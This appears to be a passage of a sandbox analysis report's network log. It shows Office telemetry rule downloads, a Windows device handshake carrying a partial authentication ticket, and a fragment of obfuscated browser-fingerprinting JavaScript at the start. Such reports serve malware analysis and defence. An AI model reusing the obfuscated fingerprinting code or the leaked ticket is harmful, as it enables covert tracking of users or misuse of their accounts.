                      2024-12-03 16:51:44 UTC16384INData Raw: 65 73 74 46 75 6c 6c 73 63 72 65 65 6e 27 5d 2c 54 4c 3e 30 2e 36 35 26 26 54 4c 3c 31 2e 35 33 5d 29 3e 3d 30 78 32 3b 7d 28 29 29 3f 4c 49 28 30 78 33 62 34 29 3a 4c 49 28 30 78 31 39 31 29 3a 54 6a 3b 7d 7d 2c 27 70 6c 75 67 69 6e 73 27 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 4c 59 3d 56 30 3b 69 66 28 4c 59 28 30 78 32 63 62 29 3d 3d 3d 4c 59 28 30 78 32 63 62 29 29 7b 76 61 72 20 54 6a 3d 6e 61 76 69 67 61 74 6f 72 5b 27 70 6c 75 67 69 6e 73 27 5d 3b 69 66 28 54 6a 29 7b 66 6f 72 28 76 61 72 20 54 61 3d 5b 5d 2c 54 56 3d 30 78 30 3b 54 56 3c 54 6a 5b 27 6c 65 6e 67 74 68 27 5d 3b 2b 2b 54 56 29 7b 76 61 72 20 54 4c 3d 54 6a 5b 54 56 5d 3b 69 66 28 54 4c 29 7b 66 6f 72 28 76 61 72 20 54 71 3d 5b 5d 2c 54 6c 3d 30 78 30 3b 54 6c 3c 54 4c 5b 4c
                      Data Ascii: estFullscreen'],TL>0.65&&TL<1.53])>=0x2;}())?LI(0x3b4):LI(0x191):Tj;}},'plugins':function(){var LY=V0;if(LY(0x2cb)===LY(0x2cb)){var Tj=navigator['plugins'];if(Tj){for(var Ta=[],TV=0x0;TV<Tj['length'];++TV){var TL=Tj[TV];if(TL){for(var Tq=[],Tl=0x0;Tl<TL[L


                      Session IDSource IPSource PortDestination IPDestination Port
                      44192.168.2.64975913.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:51:43 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:51:43 UTC470INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:51:43 GMT
                      Content-Type: text/xml
                      Content-Length: 494
                      Connection: close
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                      ETag: "0x8DC582BB8972972"
                      x-ms-request-id: 1e31e9ea-701e-0098-028a-43395f000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165143Z-174f7845968frfdmhC1EWRxxbw000000165000000000sgyf
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:51:43 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                      Session IDSource IPSource PortDestination IPDestination Port
                      45192.168.2.64976613.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:51:44 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:51:45 UTC470INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:51:45 GMT
                      Content-Type: text/xml
                      Content-Length: 427
                      Connection: close
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                      ETag: "0x8DC582BA909FA21"
                      x-ms-request-id: b5d3fb3c-c01e-000b-6fb4-42e255000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165145Z-174f7845968px8v7hC1EWR08ng00000016g0000000008x61
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:51:45 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                      Session IDSource IPSource PortDestination IPDestination Port
                      46192.168.2.64976413.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:51:44 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:51:45 UTC470INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:51:45 GMT
                      Content-Type: text/xml
                      Content-Length: 420
                      Connection: close
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                      ETag: "0x8DC582B9DAE3EC0"
                      x-ms-request-id: fce73399-c01e-0079-65f8-40e51a000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165145Z-174f7845968pght8hC1EWRyvxg00000009eg000000000xm8
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:51:45 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                      Session IDSource IPSource PortDestination IPDestination Port
                      47192.168.2.64976320.198.119.143443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:51:44 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 2b 6a 4d 53 4a 2f 47 75 6a 45 53 6e 34 38 45 2f 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 38 65 66 62 30 32 65 34 37 30 30 66 62 39 65 0d 0a 0d 0a
                      Data Ascii: CNT 1 CON 305MS-CV: +jMSJ/GujESn48E/.1Context: a8efb02e4700fb9e
                      2024-12-03 16:51:44 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                      Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                      2024-12-03 16:51:44 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 2b 6a 4d 53 4a 2f 47 75 6a 45 53 6e 34 38 45 2f 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 38 65 66 62 30 32 65 34 37 30 30 66 62 39 65 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 52 42 33 33 77 58 39 56 4c 44 37 43 76 62 50 53 6d 79 55 30 61 6f 64 4e 4e 46 38 4f 56 49 48 66 2f 43 6c 36 5a 43 41 71 66 65 4c 32 58 35 33 68 63 64 44 62 4e 6c 69 48 64 65 59 45 64 33 64 4e 58 69 79 43 44 77 4b 39 39 35 47 6a 52 55 57 4f 53 74 30 75 6e 6d 51 33 72 50 43 72 44 55 58 6a 4c 4a 56 56 50 56 32 48 70 42 56 63 32
                      Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: +jMSJ/GujESn48E/.2Context: a8efb02e4700fb9e<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAARB33wX9VLD7CvbPSmyU0aodNNF8OVIHf/Cl6ZCAqfeL2X53hcdDbNliHdeYEd3dNXiyCDwK995GjRUWOSt0unmQ3rPCrDUXjLJVVPV2HpBVc2
                      2024-12-03 16:51:44 UTC74OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 2b 6a 4d 53 4a 2f 47 75 6a 45 53 6e 34 38 45 2f 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 38 65 66 62 30 32 65 34 37 30 30 66 62 39 65 0d 0a 0d 0a
                      Data Ascii: BND 3 CON\QOS 56MS-CV: +jMSJ/GujESn48E/.3Context: a8efb02e4700fb9e
                      2024-12-03 16:51:45 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                      Data Ascii: 202 1 CON 58
                      2024-12-03 16:51:45 UTC58INData Raw: 4d 53 2d 43 56 3a 20 30 38 45 6d 44 71 75 47 74 30 71 68 56 73 37 67 37 78 50 4b 64 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                      Data Ascii: MS-CV: 08EmDquGt0qhVs7g7xPKdw.0Payload parsing failed.


                      Session IDSource IPSource PortDestination IPDestination Port
                      48192.168.2.64976513.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:51:44 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:51:45 UTC470INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:51:45 GMT
                      Content-Type: text/xml
                      Content-Length: 472
                      Connection: close
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                      ETag: "0x8DC582B9D43097E"
                      x-ms-request-id: dc0e5a4e-901e-005b-0191-3f2005000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165145Z-174f7845968qj8jrhC1EWRh41s0000001670000000006yde
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:51:45 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                      Session IDSource IPSource PortDestination IPDestination Port
                      49192.168.2.64976713.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:51:45 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:51:45 UTC470INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:51:45 GMT
                      Content-Type: text/xml
                      Content-Length: 486
                      Connection: close
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                      ETag: "0x8DC582B92FCB436"
                      x-ms-request-id: 716ae074-c01e-0046-576f-432db9000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165145Z-174f7845968vqt9xhC1EWRgten00000016b0000000002uem
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:51:45 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                      Session IDSource IPSource PortDestination IPDestination Port
                      50192.168.2.64976813.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:51:45 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:51:45 UTC470INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:51:45 GMT
                      Content-Type: text/xml
                      Content-Length: 423
                      Connection: close
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                      ETag: "0x8DC582BB7564CE8"
                      x-ms-request-id: 3b8b6251-d01e-0049-3c33-44e7dc000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165145Z-174f7845968frfdmhC1EWRxxbw00000016b0000000002xve
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:51:45 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                      Session IDSource IPSource PortDestination IPDestination Port
                      51192.168.2.64977113.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:51:47 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:51:47 UTC470INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:51:47 GMT
                      Content-Type: text/xml
                      Content-Length: 468
                      Connection: close
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                      ETag: "0x8DC582BB046B576"
                      x-ms-request-id: cdcb5222-c01e-0014-44bd-42a6a3000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165147Z-174f78459685726chC1EWRsnbg000000166g00000000ms3t
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:51:47 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                      Session IDSource IPSource PortDestination IPDestination Port
                      52192.168.2.64976913.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:51:47 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:51:47 UTC470INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:51:47 GMT
                      Content-Type: text/xml
                      Content-Length: 478
                      Connection: close
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                      ETag: "0x8DC582B9B233827"
                      x-ms-request-id: 1fa1b817-401e-0067-5691-3f09c2000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165147Z-174f7845968cdxdrhC1EWRg0en000000161g00000000w82h
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:51:47 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                      Session IDSource IPSource PortDestination IPDestination Port
                      53192.168.2.64977013.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:51:47 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:51:47 UTC470INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:51:47 GMT
                      Content-Type: text/xml
                      Content-Length: 404
                      Connection: close
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                      ETag: "0x8DC582B95C61A3C"
                      x-ms-request-id: 13e6cbbb-001e-005a-04a3-43c3d0000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165147Z-174f7845968vqt9xhC1EWRgten000000166g00000000mkn3
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:51:47 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                      Session IDSource IPSource PortDestination IPDestination Port
                      54192.168.2.64977213.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:51:47 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
